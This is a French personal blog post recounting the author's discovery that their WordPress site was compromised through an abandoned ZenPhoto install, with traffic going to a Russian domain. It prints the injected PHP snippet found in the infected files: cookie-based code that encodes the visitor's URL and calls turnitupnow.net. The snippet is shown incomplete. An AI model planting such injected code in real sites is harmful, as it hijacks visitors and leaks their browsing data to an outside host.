Je suis damné

Je pensais avoir sécurisé mon WordPress, mais j’avais laissé un trou (un gouffre) de sécurité ZenPhoto qui lui avait été laissé en vrac en friche quoi, d’ailleurs j’avais passé un certain temps à essayé de maîtriser ce truc, qui est lourd, complexe, j’ai jamais réussit à faire ce que je voulais avec, donc inutile à mes yeux et au final hautement dangereux.

Donc hier soir, après avoir réussit à stabiliser mes deux ordinateurs défaillants. Je m’attaque à la mise à jour de blog, catastrophe, le site ne charge pas, on me refuse l’accès à la console admin, la merde quoi. Je regarde d’un peut plus près le chargement du site, je remarque qu’il bloc sur une adresse du type http://desk-airline.ru, un site russe auquel mon site veux se connecter hein, c’est quoi ce délire. Et là nouvelle catastrophe, j’étais entrain de faire une MàJ d’Ubuntu avec un changement de Kernel (3.0.0-16) (une des rares fois, ou il faut redémarrer l’ordi) et paf le chien, mon portable ne redémarre pas correctement, arf, je bidouille connaissant plus ou moins la cause (Disque dur) finalement scotchée vers une heure du mat’. va me falloir un nouveau DD, mais je prévois avant une auscultation approfondit. L’opération WordPress est reporté au lendemain (oui je dors).

Aujourd’hui (10/03/2012) j’attaque direct mon site avec Firebug (toujours cette adresse russe qui m’intrigue) je trouve une bonne cinquantaine de tentative (get et post) de connexion à http://desk-airline.ru/ais/ditante.php suivit d’une colossale suite alphanumérique toutes différentes. Bon je suis bien avancer mais je fais quoi. Je teste l’adresse russe qui me renvoie des times out, normal s’ils volent encore avec des TU-134.

Je décide d’aller voir mon site par FTP, le premier truc qui me saute au yeux, c’est la date de certains fichiers est récente (08/03/20112 vers 12h45) leurs extensions .php même mon .htaccess, je récupère l’ensemble et vire tout (politique de la terre brûlée – je reviendrais sur cela) j’installe du tout beau tout chaud téléchargé chez WordPress, je teste et pan dans les dents même problème.
Je jette un coup d’œil aux sources récupérées, tous les fichiers récupérés commence par le code suivant (normalement sur une seule ligne)
[php]global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) {
$sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else {
echo ““; } } else {
if($_COOKIE[$sessdt_k]==”102”) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent())
{ @setcookie($sessdt_k,$sessdt_f); } else {
echo ““; }
$sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo ““;
echo “

Laisser un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.